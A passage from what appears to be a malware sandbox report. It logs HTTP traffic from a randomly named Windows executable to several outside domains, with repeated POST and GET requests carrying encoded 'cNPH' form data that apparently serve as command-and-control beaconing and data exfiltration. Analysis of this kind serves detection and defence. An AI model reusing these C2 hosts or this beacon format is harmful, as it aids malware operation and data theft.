HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49999	162.218.30.235	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:28.381057024 CET	702	OUT	POST /798t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.l03678.xyz Origin: http://www.l03678.xyz Referer: http://www.l03678.xyz/798t/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 2f 52 38 54 48 70 34 58 4c 69 2f 4c 4d 4c 34 51 47 51 68 68 72 6c 61 45 59 4d 30 79 68 57 2b 65 54 69 5a 37 30 47 6b 75 5a 6a 6a 54 65 6d 6a 6a 56 36 69 6b 63 50 46 46 58 4a 52 4e 6f 6b 59 6b 56 4a 47 31 6f 70 6b 2f 4e 42 7a 6d 73 75 73 43 67 58 66 31 71 76 2f 65 44 58 6e 54 4f 63 69 67 43 49 5a 77 46 39 7a 62 48 6d 5a 6f 50 73 6d 73 50 62 62 52 4c 4d 31 4a 73 2b 62 59 68 4a 44 4d 59 36 7a 6a 79 69 67 72 57 69 68 4d 4c 33 44 52 78 74 4b 33 6c 6b 64 37 78 67 37 66 41 39 2b 34 36 54 66 30 63 62 4f 59 51 70 51 35 47 4a 4a 47 32 76 4c 53 43 35 2b 69 55 46 48 76 35 6a 6b 62 4e 33 34 6a 4e 35 44 6b 7a 58 47 44 47 5a 31 6e 63 2b 75 68 61 42 59 4c 53 2f 67 77 5a 36 4c 6d 4e 6d 4b 54 31 4f 59 3d Data Ascii: cNPH=/R8THp4XLi/LML4QGQhhrlaEYM0yhW+eTiZ70GkuZjjTemjjV6ikcPFFXJRNokYkVJG1opk/NBzmsusCgXf1qv/eDXnTOcigCIZwF9zbHmZoPsmsPbbRLM1Js+bYhJDMY6zjyigrWihML3DRxtK3lkd7xg7fA9+46Tf0cbOYQpQ5GJJG2vLSC5+iUFHv5jkbN34jN5DkzXGDGZ1nc+uhaBYLS/gwZ6LmNmKT1OY=
Jan 11, 2025 02:46:28.950300932 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/ Server: Microsoft-IIS/10.0 Date: Sat, 11 Jan 2025 01:46:28 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 32 31 32 38 2f 37 39 38 74 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	50000	162.218.30.235	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:30.927308083 CET	1715	OUT	POST /798t/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.l03678.xyz Origin: http://www.l03678.xyz Referer: http://www.l03678.xyz/798t/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 2f 52 38 54 48 70 34 58 4c 69 2f 4c 4d 4c 34 51 47 51 68 68 72 6c 61 45 59 4d 30 79 68 57 2b 65 54 69 5a 37 30 47 6b 75 5a 6a 72 54 66 52 4c 6a 55 5a 4b 6b 64 50 46 46 55 4a 52 4d 6f 6b 59 6c 56 4a 65 78 6f 70 59 76 4e 45 76 6d 6a 73 55 43 68 6a 7a 31 6c 76 2f 65 42 58 6e 53 54 4d 6a 6f 43 4f 35 30 46 39 6a 62 48 6d 5a 6f 50 76 2b 73 66 36 62 52 4a 4d 31 4b 76 2b 62 55 6c 4a 44 6b 59 36 72 7a 79 69 56 51 57 55 52 4d 4b 58 54 52 7a 66 69 33 6f 6b 63 64 34 77 37 48 41 39 79 33 36 51 37 57 63 66 50 50 51 72 41 35 4b 6f 34 4e 73 66 4c 7a 42 71 43 49 65 57 4c 33 38 68 67 74 4e 6b 45 2b 49 71 72 43 78 31 2f 34 4a 4a 56 64 59 34 37 54 4c 42 67 46 57 63 77 35 56 36 32 4f 57 55 71 51 6e 4c 37 2f 2f 58 69 6a 68 78 6b 72 6c 77 34 4f 77 54 32 58 70 52 45 35 2f 79 52 2b 35 57 72 55 47 48 76 38 6d 6a 45 6a 32 37 48 4b 37 6f 73 2b 44 72 49 36 6f 56 51 65 48 64 54 39 67 64 6f 4f 67 62 61 78 59 66 70 42 62 2f 30 48 6f 5a 69 49 7a 43 77 39 33 4d 79 39 79 6b 31 49 6d 6e 46 6b 44 65 51 4a 44 53 2f 38 37 [TRUNCATED] Data Ascii: cNPH=/R8THp4XLi/LML4QGQhhrlaEYM0yhW+eTiZ70GkuZjrTfRLjUZKkdPFFUJRMokYlVJexopYvNEvmjsUChjz1lv/eBXnSTMjoCO50F9jbHmZoPv+sf6bRJM1Kv+bUlJDkY6rzyiVQWURMKXTRzfi3okcd4w7HA9y36Q7WcfPPQrA5Ko4NsfLzBqCIeWL38hgtNkE+IqrCx1/4JJVdY47TLBgFWcw5V62OWUqQnL7//Xijhxkrlw4OwT2XpRE5/yR+5WrUGHv8mjEj27HK7os+DrI6oVQeHdT9gdoOgbaxYfpBb/0HoZiIzCw93My9yk1ImnFkDeQJDS/87/TA4kolCUEv4kwH3XjDdcasFl7wOE5M5n2i72oBuuE4Q1Anuam27325wLKYx6WHGXI2/4JNZNKPk8tfcu2HEtW0kPkQcQQGeK243YoEQQ8Kr3fsWXSFF62gxzeEg6haV6+VPa1Y0dicbLfzwtRZWVjr3MEOEogAWGmk9vvMzByjAijIcTNg1XZElwTf1HYnnpKx4w+p+whzzx4u3B0rAQmAXqCeQmVRNXvVs6RxKcS9vIb4yeQ3obGvgpPBx/SRKbYFU1yYmJvnpjfXAnY473RGi5uOKVGhWKVAn1RkptJ5H+r76i6XOh6wLrIMVWSyXrl9dCqaBL1TLcrzFnNEzCtVMCbdB5QzrLwtsw8CUuPaG19Gdfab4GfE0F6+Du+GZYNv3pDTm0428sADTUbnQn3bjBJiL900jfjetShDO0ljWkgjMvqYvVA0xgEfjQ7tv3r3nY7EabqaKIP629W3yW4V0ItOSaGcsJLUcwO8vc5kquPKii2ywRT6NHtFpYCshqYd9HL69hF6m9eCtGURycOFYB4xLkoV3G/Hpu3V3Bip5yoBnNuNyd8USKEYJkhTXAMzFJzrzIuSnjZoWnQH0UghpVDtWcHnPijPeJWRm0RdzEe7o+b4zsR3Td63nEBpyLYE4ITRetuI+TmGR1yZWGIhmfEtzrgr8id [TRUNCATED]
Jan 11, 2025 02:46:31.509609938 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/ Server: Microsoft-IIS/10.0 Date: Sat, 11 Jan 2025 01:46:31 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 32 31 32 38 2f 37 39 38 74 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	50001	162.218.30.235	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:33.473252058 CET	436	OUT	GET /798t/?cNPH=yTUzEcgndw7KboVFHT9arl6MXaU44mjtDVZL03kfN2SLXi32Rry3GMticKdTmzUGS/LvnIcIaX/Cuqcp6D2L1KHgDhjkH8i+BogGG+P5HmtoXOiMf53XRo99vMLso5GtXZXy7Rd2RFdT&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.l03678.xyz Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:46:34.047383070 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/ Server: Microsoft-IIS/10.0 Date: Sat, 11 Jan 2025 01:46:33 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 32 31 32 38 2f 37 39 38 74 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=62128/798t/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	50002	192.186.58.31	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:39.436949015 CET	691	OUT	POST /lkpz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.aihuzhibo.net Origin: http://www.aihuzhibo.net Referer: http://www.aihuzhibo.net/lkpz/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 58 38 55 4e 61 34 31 56 54 56 77 54 6c 38 4a 57 32 72 57 75 63 67 66 75 75 41 61 4c 62 6f 61 63 64 7a 77 6c 4e 46 2b 37 44 53 4e 6a 43 54 5a 5a 74 72 6d 6d 5a 42 64 47 4d 4a 62 58 39 70 46 75 76 30 55 7a 45 5a 2b 38 64 44 5a 66 6c 38 4e 74 6d 41 78 59 61 34 72 69 45 51 37 66 44 4c 52 4b 4d 7a 79 69 34 49 64 55 33 2f 38 46 6b 72 4c 34 41 47 59 44 5a 4e 56 31 61 51 4f 76 67 4d 66 33 65 64 6e 37 79 49 51 36 6e 6f 79 4d 4d 32 4a 30 58 39 56 64 32 50 44 35 67 4b 5a 38 6b 63 48 31 4b 42 44 43 58 75 4b 4e 30 63 6d 41 52 55 4f 32 44 55 76 4c 56 6d 78 73 67 76 44 77 58 31 44 4f 4e 63 73 73 48 41 34 45 47 4f 71 33 6d 4d 64 72 47 41 3d 3d Data Ascii: cNPH=X8UNa41VTVwTl8JW2rWucgfuuAaLboacdzwlNF+7DSNjCTZZtrmmZBdGMJbX9pFuv0UzEZ+8dDZfl8NtmAxYa4riEQ7fDLRKMzyi4IdU3/8FkrL4AGYDZNV1aQOvgMf3edn7yIQ6noyMM2J0X9Vd2PD5gKZ8kcH1KBDCXuKN0cmARUO2DUvLVmxsgvDwX1DONcssHA4EGOq3mMdrGA==
Jan 11, 2025 02:46:40.358995914 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 11 Jan 2025 01:46:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	50003	192.186.58.31	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:41.993860960 CET	711	OUT	POST /lkpz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.aihuzhibo.net Origin: http://www.aihuzhibo.net Referer: http://www.aihuzhibo.net/lkpz/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 58 38 55 4e 61 34 31 56 54 56 77 54 6a 63 35 57 35 6f 2b 75 4e 51 66 78 69 67 61 4c 4e 59 61 59 64 7a 38 6c 4e 41 65 72 66 33 64 6a 46 33 64 5a 73 75 61 6d 65 42 64 47 44 5a 62 53 79 4a 46 6c 76 30 6f 37 45 63 65 38 64 44 64 66 6c 39 39 74 6d 78 78 66 61 6f 72 61 64 41 37 5a 4f 72 52 4b 4d 7a 79 69 34 49 59 7a 33 37 6f 46 6a 62 37 34 42 6e 59 43 54 74 56 30 54 77 4f 76 6b 4d 66 72 65 64 6e 4e 79 4a 38 55 6e 71 36 4d 4d 30 52 30 53 38 56 53 73 66 44 46 75 71 59 64 6e 5a 71 51 50 41 72 47 54 66 53 31 35 66 72 6a 64 43 50 55 5a 32 6a 6e 4c 33 4a 58 6b 74 6e 47 41 54 65 37 50 64 6f 30 4b 69 4d 6c 5a 35 50 64 72 65 38 76 51 2b 75 54 2f 42 47 2f 56 43 6a 79 6a 77 6d 78 77 6c 34 30 6a 5a 51 3d Data Ascii: cNPH=X8UNa41VTVwTjc5W5o+uNQfxigaLNYaYdz8lNAerf3djF3dZsuameBdGDZbSyJFlv0o7Ece8dDdfl99tmxxfaoradA7ZOrRKMzyi4IYz37oFjb74BnYCTtV0TwOvkMfrednNyJ8Unq6MM0R0S8VSsfDFuqYdnZqQPArGTfS15frjdCPUZ2jnL3JXktnGATe7Pdo0KiMlZ5Pdre8vQ+uT/BG/VCjyjwmxwl40jZQ=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	50004	192.186.58.31	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:44.537957907 CET	1724	OUT	POST /lkpz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.aihuzhibo.net Origin: http://www.aihuzhibo.net Referer: http://www.aihuzhibo.net/lkpz/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 58 38 55 4e 61 34 31 56 54 56 77 54 6a 63 35 57 35 6f 2b 75 4e 51 66 78 69 67 61 4c 4e 59 61 59 64 7a 38 6c 4e 41 65 72 66 33 56 6a 43 45 46 5a 74 4e 79 6d 66 42 64 47 41 5a 62 54 79 4a 46 34 76 30 77 2f 45 63 61 4b 64 47 42 66 6c 66 46 74 67 44 4a 66 55 6f 72 61 41 51 37 59 44 4c 52 66 4d 7a 6a 4b 34 4c 77 7a 33 37 6f 46 6a 59 7a 34 43 32 59 43 63 4e 56 31 61 51 4f 6a 67 4d 66 58 65 63 43 34 79 4a 34 71 6e 5a 69 4d 4e 55 42 30 56 61 68 53 30 50 44 39 70 71 59 2f 6e 5a 75 44 50 41 33 77 54 66 6d 62 35 64 37 6a 59 58 53 55 44 58 76 61 4b 31 42 64 72 4e 61 6a 4d 68 4f 7a 43 74 67 5a 50 7a 64 47 55 70 54 32 71 75 49 77 46 66 54 57 70 58 36 79 59 42 76 77 79 30 32 35 6f 45 6b 6b 32 4a 34 61 61 43 61 6b 58 70 47 69 68 78 2b 79 6f 33 45 72 4a 56 70 54 76 73 43 51 4b 38 69 6b 4b 77 49 66 6e 7a 37 38 46 48 33 4f 35 44 72 46 56 56 30 49 4f 32 32 5a 53 68 32 77 4b 39 2f 55 45 67 30 4f 55 37 6a 69 32 68 4d 63 42 41 2b 36 54 44 41 7a 4b 4c 59 39 70 63 66 59 69 6f 6e 77 4d 4a 46 2f 2b 79 31 5a 48 [TRUNCATED] Data Ascii: cNPH=X8UNa41VTVwTjc5W5o+uNQfxigaLNYaYdz8lNAerf3VjCEFZtNymfBdGAZbTyJF4v0w/EcaKdGBflfFtgDJfUoraAQ7YDLRfMzjK4Lwz37oFjYz4C2YCcNV1aQOjgMfXecC4yJ4qnZiMNUB0VahS0PD9pqY/nZuDPA3wTfmb5d7jYXSUDXvaK1BdrNajMhOzCtgZPzdGUpT2quIwFfTWpX6yYBvwy025oEkk2J4aaCakXpGihx+yo3ErJVpTvsCQK8ikKwIfnz78FH3O5DrFVV0IO22ZSh2wK9/UEg0OU7ji2hMcBA+6TDAzKLY9pcfYionwMJF/+y1ZH5adaPTtfLfR7ciSTSfpevIu2kLSawPfcESVidvuqPYQjz177Zli/Bt0bRYuHC8Esp9AnayZS3UggSZTbow4lHlK3tNSYwKwX8Nwel8hctXpVaGsdUjjuJIHSOdDoHiQr0ksFD2V//GHiaOgzoE+bZGLmecmJN61kaVN0tw/pcXx3Sjkz8Q74q192YVsaTBzXFRoUzRmXNTeZ+dWxJH2HQFOXuMVQMRAaBfRTv/exMBqgBBwuQJtjeVe43HlJTmhoonYeU1siCinq7mYs9RTj7skwxMk6IcfXzyTTs9IA0fWDvOUEg3mPVmjH1/GE06SeGmvbg9Dt26yLNmmLi9rVjRHvVFH8yCBmTsos0VGP6pq4i9MrXpLCaz6bYCWsCKU+Qwd/x9QRCb96gUhvrqAbyA4rrdoaY50hH3yr14eeuVijYO0CpVlIpatlaMzM16Q4whQFMLE1dcsJTnUbwwuThjjh5SC9iArmzgigbtFnBd9ADhY8v0811YdCFtCt+g7TtlSY3uPCCuWyISw0FDPbEjbHPebAn1Duw00T92eHtHspBTzbVYd1u2gW5lhvI9/vCKpULeh/+49B3XzN/WcWWf+wfGetFvqdh/iya/Ib/vOhbtE2w5aC3LE/tW6viBIDxOJpI/n4JHDx9NajPm9yuKgSTByE/WvcSD [TRUNCATED]
Jan 11, 2025 02:46:45.420588970 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 11 Jan 2025 01:46:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	50005	192.186.58.31	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:47.077867985 CET	439	OUT	GET /lkpz/?EtJTX=_JVX4ryxDRQpLJF&cNPH=a+8tZPlcc3MNn/IO7b26MGHwqGX4ZM28Vil8O2eWSStdH20Wtc2TLwFiK67R05JNij1gEaiCLQN0rb1G+EZEFovULwD+AM9JU3Wl4pQU58Rskq7vQFRuJegvcl6TpOCUQoL70LsVvLez HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.aihuzhibo.net Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:46:48.010176897 CET	193	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Sat, 11 Jan 2025 01:46:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	50006	47.83.1.90	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:53.083972931 CET	685	OUT	POST /1dyw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.dkeqqi.info Origin: http://www.dkeqqi.info Referer: http://www.dkeqqi.info/1dyw/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 6d 36 67 6f 58 71 4f 72 38 59 6b 68 74 34 52 57 51 61 75 56 7a 75 79 71 66 6d 6c 72 78 34 69 4c 70 51 77 52 47 77 51 55 6d 77 49 4b 51 78 73 71 63 65 71 68 59 4f 61 58 45 66 4d 55 64 41 45 44 39 53 46 4c 4a 77 6a 6b 59 44 2f 7a 6f 56 79 7a 6c 41 72 35 32 64 6f 52 41 57 68 56 49 6c 6a 59 58 65 61 62 69 74 39 54 48 68 4d 59 48 39 4b 35 49 39 6e 6e 50 35 47 4c 6f 53 78 70 41 38 65 72 31 51 78 71 39 51 52 6a 63 43 77 52 57 39 79 2f 73 30 4d 61 38 39 37 42 69 43 33 43 32 4c 64 36 63 30 47 58 79 6b 48 78 41 79 46 6f 74 41 4c 41 6b 69 4c 41 63 30 4d 58 5a 6f 37 52 78 49 54 61 62 54 37 69 72 58 41 67 4a 33 49 4b 37 43 6d 6b 74 41 3d 3d Data Ascii: cNPH=m6goXqOr8Ykht4RWQauVzuyqfmlrx4iLpQwRGwQUmwIKQxsqceqhYOaXEfMUdAED9SFLJwjkYD/zoVyzlAr52doRAWhVIljYXeabit9THhMYH9K5I9nnP5GLoSxpA8er1Qxq9QRjcCwRW9y/s0Ma897BiC3C2Ld6c0GXykHxAyFotALAkiLAc0MXZo7RxITabT7irXAgJ3IK7CmktA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	50007	47.83.1.90	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:55.794506073 CET	705	OUT	POST /1dyw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.dkeqqi.info Origin: http://www.dkeqqi.info Referer: http://www.dkeqqi.info/1dyw/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 6d 36 67 6f 58 71 4f 72 38 59 6b 68 75 5a 68 57 53 37 75 56 31 4f 79 31 54 47 6c 72 6e 49 69 50 70 51 38 52 47 78 55 45 6e 44 38 4b 51 51 38 71 64 66 71 68 66 4f 61 58 63 76 4d 52 53 67 45 79 39 53 49 30 4a 79 6e 6b 59 44 37 7a 6f 56 69 7a 6b 78 72 34 6b 39 6f 54 62 6d 68 58 48 46 6a 59 58 65 61 62 69 73 5a 31 48 69 38 59 48 74 61 35 4a 63 6e 6d 48 5a 47 4b 68 79 78 70 45 38 65 76 31 51 78 49 39 53 6b 4d 63 45 38 52 57 34 4f 2f 76 6c 4d 64 32 39 37 48 6d 43 32 30 77 75 39 2f 64 57 43 6f 34 43 4c 78 5a 52 46 67 6f 32 4b 69 2b 41 48 73 43 6c 30 73 64 71 66 6e 6d 75 4f 76 5a 53 2f 36 6d 31 30 42 57 41 74 67 32 51 48 67 37 2b 35 74 6c 70 7a 39 30 48 48 71 73 73 44 66 73 73 66 74 41 31 55 3d Data Ascii: cNPH=m6goXqOr8YkhuZhWS7uV1Oy1TGlrnIiPpQ8RGxUEnD8KQQ8qdfqhfOaXcvMRSgEy9SI0JynkYD7zoVizkxr4k9oTbmhXHFjYXeabisZ1Hi8YHta5JcnmHZGKhyxpE8ev1QxI9SkMcE8RW4O/vlMd297HmC20wu9/dWCo4CLxZRFgo2Ki+AHsCl0sdqfnmuOvZS/6m10BWAtg2QHg7+5tlpz90HHqssDfssftA1U=
Jan 11, 2025 02:46:57.302644968 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 01:46:57 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	50008	47.83.1.90	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:46:58.358795881 CET	1718	OUT	POST /1dyw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.dkeqqi.info Origin: http://www.dkeqqi.info Referer: http://www.dkeqqi.info/1dyw/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 6d 36 67 6f 58 71 4f 72 38 59 6b 68 75 5a 68 57 53 37 75 56 31 4f 79 31 54 47 6c 72 6e 49 69 50 70 51 38 52 47 78 55 45 6e 44 6b 4b 52 69 6b 71 62 38 43 68 65 4f 61 58 56 50 4d 51 53 67 45 76 39 53 41 34 4a 79 37 30 59 42 7a 7a 70 32 61 7a 6a 46 66 34 76 39 6f 54 45 57 68 55 49 6c 6a 6f 58 61 47 66 69 73 4a 31 48 69 38 59 48 72 6d 35 5a 39 6e 6d 46 5a 47 4c 6f 53 78 6c 41 38 65 48 31 51 70 79 39 53 68 7a 66 30 63 52 52 5a 2b 2f 75 58 30 64 72 4e 37 46 72 69 32 38 77 75 34 76 64 57 65 4f 34 43 58 62 5a 54 56 67 71 52 54 34 72 55 58 70 5a 6e 6b 57 61 63 4c 78 74 49 43 4d 64 45 43 47 